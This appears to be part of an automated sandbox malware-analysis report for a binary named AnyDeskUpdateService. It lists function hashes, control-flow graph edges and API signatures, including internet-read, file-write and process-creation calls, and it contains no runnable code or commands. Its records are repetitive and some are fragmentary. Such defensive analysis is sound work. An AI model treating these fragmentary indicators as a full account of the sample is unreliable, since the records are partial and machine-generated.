                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617910340-0
                                                                                                      • Opcode ID: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction ID: d4fca14b252321b009f4aadd3a99124538b94fcfb2332eca79d4876ccc2730d6
                                                                                                      • Opcode Fuzzy Hash: 1b731941ab77a7d7e1ee044a851ff69ec3e8d83a8cd4698c13b8954ec901e107
                                                                                                      • Instruction Fuzzy Hash: C6C10432B28E4995EB10DF64C4902BD7761FB4ABA8F815236DA5E47394EF38E119C710

                                                                                                      Control-flow Graph

                                                                                                      • Graph entry: 7ff71ddae95c (edge data omitted). No Windows API is called directly from this function; the APIs reached through its subcalls are listed under APIs below
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDAE999
                                                                                                        • Part of subcall function 00007FF71DDA9A04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDA9A29
                                                                                                        • Part of subcall function 00007FF71DDB98D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDB98FC
                                                                                                        • Part of subcall function 00007FF71DDAB1D8: HeapFree.KERNEL32 ref: 00007FF71DDAB1EE
                                                                                                        • Part of subcall function 00007FF71DDAB1D8: GetLastError.KERNEL32 ref: 00007FF71DDAB1F8
                                                                                                        • Part of subcall function 00007FF71DDAEBAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71DDAEBEA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ErrorFreeHeapLast
                                                                                                      • String ID: .com
                                                                                                      • API String ID: 3231943733-4200470757
                                                                                                      • Opcode ID: 285768c466a6b3df03c4c0973ef54bcda0a58e502a2d52bb56038eee2e94fb96
                                                                                                      • Instruction ID: 117ce214470990ad347971f872275945cbca7d338e38b0ece4e91c15de467e54
                                                                                                      • Opcode Fuzzy Hash: 285768c466a6b3df03c4c0973ef54bcda0a58e502a2d52bb56038eee2e94fb96
                                                                                                      • Instruction Fuzzy Hash: E4518411B0DA4A45FA64BA2298112B9A681AF44FF0FC98537DD9E477D2FD3CF4098B20

                                                                                                      Control-flow Graph

                                                                                                      • Graph entry: 7ff71ddaebac (edge data omitted). Windows APIs referenced: WaitForSingleObject, GetExitCodeProcess, CloseHandle
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2936579111-0
                                                                                                      • Opcode ID: bd42c7ecaa9f5b6cff4489de4fad8ec41595277462ff7ce3a88bd78bf3a93305
                                                                                                      • Instruction ID: 0306d22a1dc646d1fcd6ed21abca846a3036a7e9054ac2cb2156ea03d92f8e29
                                                                                                      • Opcode Fuzzy Hash: bd42c7ecaa9f5b6cff4489de4fad8ec41595277462ff7ce3a88bd78bf3a93305
                                                                                                      • Instruction Fuzzy Hash: 46616222B0DF0A85FB10BF61D4402BCA3A2AB45FB4F854536DD8E17785EE38E449CB60

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1047 7ff71ddab2d4-7ff71ddab326 1048 7ff71ddab417 1047->1048 1049 7ff71ddab32c-7ff71ddab32f 1047->1049 1050 7ff71ddab419-7ff71ddab435 1048->1050 1051 7ff71ddab331-7ff71ddab334 1049->1051 1052 7ff71ddab339-7ff71ddab33c 1049->1052 1051->1050 1053 7ff71ddab342-7ff71ddab351 1052->1053 1054 7ff71ddab3fc-7ff71ddab40f 1052->1054 1055 7ff71ddab361-7ff71ddab374 call 7ff71ddc0228 1053->1055 1056 7ff71ddab353-7ff71ddab356 1053->1056 1054->1048 1061 7ff71ddab37a-7ff71ddab380 1055->1061 1057 7ff71ddab456-7ff71ddab465 GetProcAddress 1056->1057 1058 7ff71ddab35c 1056->1058 1062 7ff71ddab3f5 1057->1062 1063 7ff71ddab467-7ff71ddab48e 1057->1063 1060 7ff71ddab3e8-7ff71ddab3ef 1058->1060 1060->1053 1060->1062 1064 7ff71ddab436-7ff71ddab44b 1061->1064 1065 7ff71ddab386-7ff71ddab38f call 7ff71ddc0050 1061->1065 1062->1054 1063->1050 1064->1057 1067 7ff71ddab44d-7ff71ddab450 call 7ff71ddc0220 1064->1067 1070 7ff71ddab391-7ff71ddab3a8 call 7ff71ddaa340 1065->1070 1071 7ff71ddab3d6-7ff71ddab3e0 1065->1071 1067->1057 1070->1071 1074 7ff71ddab3aa-7ff71ddab3be call 7ff71ddaa340 1070->1074 1071->1060 1074->1071 1077 7ff71ddab3c0-7ff71ddab3d4 call 7ff71ddc0228 1074->1077 1077->1064 1077->1071
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
• Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
                                                                                                      • Instruction ID: 1f4ae6a551318d141e96885d58c002e6f85b0105cc729c2eca18311eabd82fc2
                                                                                                      • Opcode Fuzzy Hash: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
                                                                                                      • Instruction Fuzzy Hash: 18411A21B1DE1642FA11EB16A850676A395BF05FB0FC68637DD8D47780FE3CE40A8B20

                                                                                                      Control-flow Graph

control_flow_graph 1080 7ff71ddac85c-7ff71ddac881 1081 7ff71ddacb4f 1080->1081 1082 7ff71ddac887-7ff71ddac88a 1080->1082 1083 7ff71ddacb51-7ff71ddacb61 1081->1083 1084 7ff71ddac8c3-7ff71ddac8ef 1082->1084 1085 7ff71ddac88c-7ff71ddac8be call 7ff71dda498c 1082->1085 1087 7ff71ddac8f1-7ff71ddac8f8 1084->1087 1088 7ff71ddac8fa-7ff71ddac900 1084->1088 1085->1083 1087->1085 1087->1088 1089 7ff71ddac902-7ff71ddac90b call 7ff71ddb1340 1088->1089 1090 7ff71ddac910-7ff71ddac925 call 7ff71ddb7ee4 1088->1090 1089->1090 1095 7ff71ddaca3f-7ff71ddaca48 1090->1095 1096 7ff71ddac92b-7ff71ddac934 1090->1096 1098 7ff71ddaca4a-7ff71ddaca50 1095->1098 1099 7ff71ddaca9c-7ff71ddacac1 WriteFile 1095->1099 1096->1095 1097 7ff71ddac93a-7ff71ddac93e 1096->1097 1102 7ff71ddac94f-7ff71ddac95a 1097->1102 1103 7ff71ddac940-7ff71ddac948 call 7ff71dda2bf0 1097->1103 1104 7ff71ddaca52-7ff71ddaca55 1098->1104 1105 7ff71ddaca88-7ff71ddaca95 call 7ff71ddac314 1098->1105 1100 7ff71ddacac3-7ff71ddacac9 call 7ff71ddc0050 1099->1100 1101 7ff71ddacacc 1099->1101 1100->1101 1108 7ff71ddacacf 1101->1108 1112 7ff71ddac96b-7ff71ddac980 call 7ff71ddc02e0 1102->1112 1113 7ff71ddac95c-7ff71ddac965 1102->1113 1103->1102 1110 7ff71ddaca74-7ff71ddaca86 call 7ff71ddac534 1104->1110 1111 7ff71ddaca57-7ff71ddaca5a 1104->1111 1114 7ff71ddaca9a 1105->1114 1116 7ff71ddacad4 1108->1116 1122 7ff71ddaca2c-7ff71ddaca33 1110->1122 1118 7ff71ddacae0-7ff71ddacaea 1111->1118 1119 7ff71ddaca60-7ff71ddaca72 call 7ff71ddac418 1111->1119 1132 7ff71ddac986-7ff71ddac98c 1112->1132 1133 7ff71ddaca38 1112->1133 1113->1095 1113->1112 1114->1122 1123 7ff71ddacad9 1116->1123 1125 7ff71ddacb48-7ff71ddacb4d 1118->1125 1126 7ff71ddacaec-7ff71ddacaf1 1118->1126 1119->1122 1122->1116 1123->1118 1125->1083 1130 7ff71ddacb1f-7ff71ddacb29 1126->1130 1131 7ff71ddacaf3-7ff71ddacaf6 1126->1131 1136 7ff71ddacb30-7ff71ddacb3f 1130->1136 1137 7ff71ddacb2b-7ff71ddacb2e 1130->1137 1138 7ff71ddacb0f-7ff71ddacb1a call 7ff71dda4b80 1131->1138 1139 7ff71ddacaf8-7ff71ddacb07 1131->1139 1134 7ff71ddac992-7ff71ddac995 1132->1134 1135 7ff71ddaca15-7ff71ddaca27 call 7ff71ddabe9c 1132->1135 1133->1095 1140 7ff71ddac9a0-7ff71ddac9ae 1134->1140 1141 7ff71ddac997-7ff71ddac99a 1134->1141 1135->1122 1136->1125 1137->1081 1137->1136 1138->1130 1139->1138 1145 7ff71ddac9b0 1140->1145 1146 7ff71ddaca0c-7ff71ddaca10 1140->1146 1141->1123 1141->1140 1147 7ff71ddac9b4-7ff71ddac9cb call 7ff71ddb812c 1145->1147 1146->1108 1150 7ff71ddaca03-7ff71ddaca09 call 7ff71ddc0050 1147->1150 1151 7ff71ddac9cd-7ff71ddac9d9 1147->1151 1150->1146 1152 7ff71ddac9f8-7ff71ddac9ff 1151->1152 1153 7ff71ddac9db-7ff71ddac9ed call 7ff71ddb812c 1151->1153 1152->1146 1157 7ff71ddaca01 1152->1157 1153->1150 1159 7ff71ddac9ef-7ff71ddac9f6 1153->1159 1157->1147 1159->1152
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
• Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: b6fc4f158a9e9c29caf92685fa59fc20505ba3f633a93bb908a21979db94a982
                                                                                                      • Instruction ID: 9d18aeffaa0142721c403345f62bbae0e3d3b8cf9cba9c4233cc22c7a792bb05
                                                                                                      • Opcode Fuzzy Hash: b6fc4f158a9e9c29caf92685fa59fc20505ba3f633a93bb908a21979db94a982
                                                                                                      • Instruction Fuzzy Hash: 7A91D826A1CE5945F760EF69944027CA7A0BB05FB8F948137DE8E57784EE3CE449CB20

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
• Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction ID: 33768de9a17097765ee126ba057d9039428b93fa76b07b2234b07193e73c1cbb
                                                                                                      • Opcode Fuzzy Hash: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction Fuzzy Hash: EAD09E10F2CF1E86EA5C7F7458951B8D2166F49776F80183EC98F47397EE2EA40D8A60

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1418 7ff71dd97b1c-7ff71dd97b37 call 7ff71dd97cf0 1421 7ff71dd97c73-7ff71dd97c7d call 7ff71dd98430 1418->1421 1422 7ff71dd97b3d-7ff71dd97b55 call 7ff71dd97cb4 1418->1422 1427 7ff71dd97c7e-7ff71dd97c83 call 7ff71dd98430 1421->1427 1422->1427 1428 7ff71dd97b5b-7ff71dd97b5d 1422->1428 1432 7ff71dd97c88-7ff71dd97c8a call 7ff71dd9d480 1427->1432 1430 7ff71dd97b5f-7ff71dd97b7e call 7ff71dda7918 1428->1430 1431 7ff71dd97ba9-7ff71dd97bac 1428->1431 1439 7ff71dd97b80-7ff71dd97b85 1430->1439 1440 7ff71dd97b8a-7ff71dd97ba7 call 7ff71dda78d4 1430->1440 1434 7ff71dd97bb1-7ff71dd97bc4 call 7ff71dd97e50 call 7ff71dd98418 1431->1434 1438 7ff71dd97c8f-7ff71dd97ca9 call 7ff71dd9d434 call 7ff71dd98324 1432->1438 1449 7ff71dd97be4-7ff71dd97bf0 call 7ff71dd98420 1434->1449 1450 7ff71dd97bc6-7ff71dd97bd0 call 7ff71dd97db8 1434->1450 1463 7ff71dd97cad 1438->1463 1443 7ff71dd97c63-7ff71dd97c72 1439->1443 1440->1434 1459 7ff71dd97bf2-7ff71dd97bfc call 7ff71dd97db8 1449->1459 1460 7ff71dd97c06-7ff71dd97c23 call 7ff71dda787c call 7ff71dda7af0 call 7ff71dda7ae8 call 7ff71dd82840 1449->1460 1450->1449 1458 7ff71dd97bd2-7ff71dd97bde call 7ff71ddc03a0 1450->1458 1458->1449 1459->1460 1468 7ff71dd97bfe-7ff71dd97c01 call 7ff71dd9d440 1459->1468 1474 7ff71dd97c28-7ff71dd97c31 call 7ff71dd98580 1460->1474 1463->1463 1468->1460 1474->1432 1477 7ff71dd97c33-7ff71dd97c36 1474->1477 1478 7ff71dd97c38 call 7ff71dd9d424 1477->1478 1479 7ff71dd97c3d-7ff71dd97c48 call 7ff71dd97e74 1477->1479 1478->1479 1479->1443
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
• Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1236291503-0
                                                                                                      • Opcode ID: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction ID: 66b64beb2e039bdf75de4cdef55469f884561b8e68aa8a684930c741649545f7
                                                                                                      • Opcode Fuzzy Hash: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction Fuzzy Hash: 3B413E11E0CD0AA1EE18BB6494523B99292AF457A4FC54037E9CD473D7FE2EA80D8A71

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1483 7ff71ddac314-7ff71ddac37a call 7ff71dd98000 1486 7ff71ddac3eb-7ff71ddac415 call 7ff71dd976f0 1483->1486 1487 7ff71ddac37c 1483->1487 1488 7ff71ddac381-7ff71ddac384 1487->1488 1490 7ff71ddac386-7ff71ddac38d 1488->1490 1491 7ff71ddac3aa-7ff71ddac3cf WriteFile 1488->1491 1493 7ff71ddac38f-7ff71ddac395 1490->1493 1494 7ff71ddac398-7ff71ddac3a8 1490->1494 1495 7ff71ddac3d1-7ff71ddac3da 1491->1495 1496 7ff71ddac3e3-7ff71ddac3e9 call 7ff71ddc0050 1491->1496 1493->1494 1494->1488 1494->1491 1495->1486 1497 7ff71ddac3dc-7ff71ddac3df 1495->1497 1496->1486 1497->1487 1499 7ff71ddac3e1 1497->1499 1499->1486
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
• Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction ID: 7c0f2cd182d9d7eb8670f5970d3de762f05df71a364a7c8b1afb7f043117b7cc
                                                                                                      • Opcode Fuzzy Hash: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction Fuzzy Hash: 3631C83661CE8596DB11AF19E4442A9B7A0FB58BA4F848037DB8D83754EF3CD519CB10

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1501 7ff71ddaafd4-7ff71ddaafef 1502 7ff71ddaaff2-7ff71ddab01b 1501->1502 1503 7ff71ddab027-7ff71ddab030 1502->1503 1504 7ff71ddab01d-7ff71ddab022 1502->1504 1506 7ff71ddab032-7ff71ddab035 1503->1506 1507 7ff71ddab048 1503->1507 1505 7ff71ddab0b2-7ff71ddab0bb 1504->1505 1505->1502 1509 7ff71ddab0c1-7ff71ddab0db 1505->1509 1510 7ff71ddab041-7ff71ddab046 1506->1510 1511 7ff71ddab037-7ff71ddab03f 1506->1511 1508 7ff71ddab04d-7ff71ddab05e GetStdHandle 1507->1508 1512 7ff71ddab060-7ff71ddab06b GetFileType 1508->1512 1513 7ff71ddab08d-7ff71ddab0a5 1508->1513 1510->1508 1511->1508 1512->1513 1514 7ff71ddab06d-7ff71ddab078 1512->1514 1513->1505 1515 7ff71ddab0a7-7ff71ddab0ab 1513->1515 1516 7ff71ddab081-7ff71ddab084 1514->1516 1517 7ff71ddab07a-7ff71ddab07f 1514->1517 1515->1505 1516->1505 1518 7ff71ddab086-7ff71ddab08b 1516->1518 1517->1505 1518->1505
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
• Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction ID: 45b7085b39646d5c3f87c89869cee1a007f8f6a6e1b7a4083119a5f725ac47d0
                                                                                                      • Opcode Fuzzy Hash: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction Fuzzy Hash: D031E421A1CF5981DB209B148590138AA50FB46FB0FA5073ADBFE033E0DF38E4A6CB54
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
• Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                      • String ID:
Similarity
• API ID: CreateProcess
• String ID:
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
Similarity
• API ID: AllocateHeap
• String ID:
APIs
• __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF71DD97D04
  • Part of subcall function 00007FF71DD998F0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF71DD998F8
  • Part of subcall function 00007FF71DD998F0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF71DD998FD
Similarity
• API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
• String ID:
Similarity
• API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
• String ID: utf8
Similarity
• API ID: FileInternet$OpenRead$CloseCreateHandleWrite
• String ID:
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
                                                                                                      • API String ID: 2227656907-0
                                                                                                      • Opcode ID: 658c65c6f5ef4d0db26e92ac1cc86db02e546a4b2c9906c63f91599e1882df55
                                                                                                      • Instruction ID: e3443e64604a12f373c593b7a0382d3afeb50fb7f4fc8ef94aaa82b91ec25fa5
                                                                                                      • Opcode Fuzzy Hash: 658c65c6f5ef4d0db26e92ac1cc86db02e546a4b2c9906c63f91599e1882df55
                                                                                                      • Instruction Fuzzy Hash: E5B1B422B1CE9A51EA61AB2594001BDE390EB46BF8FC44133ED9D47B85FE3CE549DB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: PATH$\
                                                                                                      • API String ID: 3215553584-1896636505
                                                                                                      • Opcode ID: 78d1498a7ba4fc8b108e4d11ee0c9dc7d413f3dcf0b479bb9b363cac964cb1ff
                                                                                                      • Instruction ID: 9a8d7db16d31b83d042291bfae41935d6b5bb3759e8c88bd0afcd788175864fc
                                                                                                      • Opcode Fuzzy Hash: 78d1498a7ba4fc8b108e4d11ee0c9dc7d413f3dcf0b479bb9b363cac964cb1ff
                                                                                                      • Instruction Fuzzy Hash: 3791C623F0CE4A45FB24BB71945027DA6A06F45F78F9485F7EE8D063C5EE3CA4498A21
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID: invalid string position
                                                                                                      • API String ID: 2081738530-1799206989
                                                                                                      • Opcode ID: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
                                                                                                      • Instruction ID: 73e10c62882552bdd5bc853548dfaa35c1eed28139ebac894333aad22978deb6
                                                                                                      • Opcode Fuzzy Hash: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
                                                                                                      • Instruction Fuzzy Hash: C4817322A0CE4985EE14EF15D490279A761FF84BA4F984233DE9D077A5EF3DE44ACB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
